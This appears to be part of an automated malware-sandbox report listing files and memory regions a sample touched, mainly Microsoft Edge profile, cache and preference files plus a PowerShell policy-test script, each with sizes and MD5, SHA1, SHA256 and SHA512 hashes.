C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000020

Filesize
33KB

MD5
a6c3385ecfd40d6a69f972893af8e3be

SHA1
66c3572e7024c004aa3681a90f4d3d69d2dd84d6

SHA256
dfa8cd2315c5cdeaba2548eb4cba9ebde70d458b1346d1b9509ff58d97b4277a

SHA512
e07d8c1eb00614c4e5919e0d9b7de2ea4558fe8e2caaa561017195b79c05fac706e3916400edd511f0c78f945c94e10c06ca065cc780366f2885abed7f67a3df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000021

Filesize
32KB

MD5
f80b5c4eed9f09d1930e9b76b9008244

SHA1
e3136129e87daa377854fe948ddcc5b88e8baf42

SHA256
9727db239709c756bc11165d23e91c4db5c6b299d4fb684a872b95beee108600

SHA512
9fc4007523ced3cb91cf2176ac3369d8c05facfa71c153b92bd78ec658785b7b612c21d974d0eec3b82e88f16d4c5f9d3830d378aebcfd2f602114ec4c2de4c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000023

Filesize
17KB

MD5
eb4cf7babe624ca5751ffc0bd0029da7

SHA1
d9014486ade1ac5c32014c707acc93b0eb51d0b4

SHA256
3f66a84c6c0db43726cd535a95616bf062cc999f9d872768cfe5cf20e3452657

SHA512
feddc8a9a16969b0965312097a2daac2cc9f2f19609574018a6a779a21af933a2881b77d70dc104d207389f951ba60e6f8d3b04ffc87826d18b84db684713640

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
a98d4d709dd1de6b5f83c658ddd675f2

SHA1
a48ba9c36f5fdd3e3a0c6aa0b0df9e95958c591a

SHA256
d6adb217f70f99609f563d85c57096dd0de09a6a0bad92c5d24ed247bdd50c2d

SHA512
b1b11792dff1a778c1b4e87b3b385737fb5a7a2df2ab4f8c288bad909980d27ba8c5a2068ea258925fc139a6b8ba6863beb518cba37e0a57292371da80b4ecb6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
50e21e3dfea182a023eacf0a01d2858d

SHA1
b8d347f7275b72c7b0f0c964982e9234d806b751

SHA256
571402eecac25dd30965f4fa641558de34693de2dbe4a5e8402e5ec61e6ea9a3

SHA512
cc3082667a985afdb38df58be0f235d1614ce5b26fe4f6409213b4859a5eb86254f5d666956b4dfc07801af6265f2fe7b6e963697f96b1db709ff532b570398e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
6d6a6f906ac920d0a4b2a963f5c9ec61

SHA1
752999574d32e79b6fa06cf00c0334037cb3ad82

SHA256
6c455b1af61f4c334f3db1e1635bc440ddc5e39aac11b78a9c2ca5dc714c5f7a

SHA512
bc6a00c5936a76baa1c20707a32ed40081354529a239743e407b91850b325f743b3ec6c12a2ba4749335086f90ceeb446421f0d589b75c08c29df85189e20864

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
7c10909f4a805ef0701bf7b29d5563c8

SHA1
6b5964ce281d8a03a82c660fd28a0ff350948dc7

SHA256
b70d0a162ccd8aa8cc53c21b3f0e5104eda9e6dfd242ce4271bd9301879f7fa2

SHA512
ddf000948a113a7e449887934d4359227a54e87ce6177f1b78e6978cfa7be0b6801e76cff7b5cb1524eac6c19f402df5cfead214fa91cb98b95a89a3ba07dc40

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
ce592a244551bf1d81ce27d65d31340f

SHA1
df322a56ee0c67af29f8cb48574c40c9e179b4a9

SHA256
5d75ceb27f7ef7bb41159ec0023eef514fff7c247696571d18401434e3c94ee2

SHA512
f848fb83545f7da4e1ed7a00a8475e98bf5666172febffadd32db61383a0bc8ba3b0c4efbcec3847e1d135fc4f9c9f13833cdcd26cb985a8c9927cc1c3076daf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
96f00bbd6a174879c58220f95f0115f5

SHA1
d3d7f82b0bf27daf1b3903bfe050c2d05422050f

SHA256
644442e740a8c0bb20f712f6f84f5bf4a81bb29d4e9446b2832ca65618961107

SHA512
e7c5e90eb85aee7b81b9c163f618ad3789a48b256040f6f00eee7fce52c60e1ff491bf0538b9c846fb115b73163710e46a45ce056e3b41ca59d88c421502ccea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
c46ad08af575f5a1c7f2471e3ac0b0bc

SHA1
6ac07c6f8ae33972b9bd2e179f33e78504c3ed10

SHA256
bf9453711d12a407bb39b507bb589b998d97c610bda7cf883503627a86b108af

SHA512
f2f0c148fdd1cc5b3c27b2f27b2f5ae828a90297ed97a7c0ecd96e8b24b8ea95557b33e5c4e0b9cd8111149750a7085528a5fb6bf9e5b288c77b4b3e29dbff67

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
8bee1d21a5674996a4f36fd1dd2851dc

SHA1
184e222cada11953b8f5606d2154c1fc9469d0dc

SHA256
e6535c3a3e0ed138b52e32147a2d1685efc6f0f4451e1e68bbe75454132fc2ff

SHA512
94f9d1ea5131589ee1156548894dfc1f5eb2720b286f8c326242d68c5c2dc635f2fa6b94f186770d807ce9e5c63c45bc9a253f1a35a6cb7a156c617b65240c11

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
85b68b1a7c7581c06ef7535ea464414e

SHA1
b7f398c8df06a042567dd7cde5ff7c51a6f4f926

SHA256
db985faa70711d2945cf8a598c6515995bbadefba61420343dacaf31d06ae81c

SHA512
475bc2cfa1dd5f0b4865e2d4a086d8e8b5da77e279b2f273789c3de039464361483e1111f21c02687c35b395057f54a3fd80469576c1355a3d90941e26621117

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
660facaf9c61b8014ccde29a752a5664

SHA1
bf664bea6ae7cb0c6191aa0b19c36fa6712ad082

SHA256
7200e79df7d509e54ac65622a78057459f3781014a7880b9a1f00136675d0f4e

SHA512
b1976c69095b3601e8e98d32d3a0f33d9e11906803e835ce191713511e081803bef31f4722e852f9a04dad3cb8b83cf78f6c2cb2a10f7b9f85f78020816337ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tpuzyk2g.fbw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1124-138-0x000001B564620000-0x000001B564642000-memory.dmp

Filesize
136KB

Download
memory/1124-145-0x00007FFB91670000-0x00007FFB92131000-memory.dmp

Filesize
10.8MB

Download
memory/1124-146-0x00007FFB91670000-0x00007FFB92131000-memory.dmp

Filesize
10.8MB

Download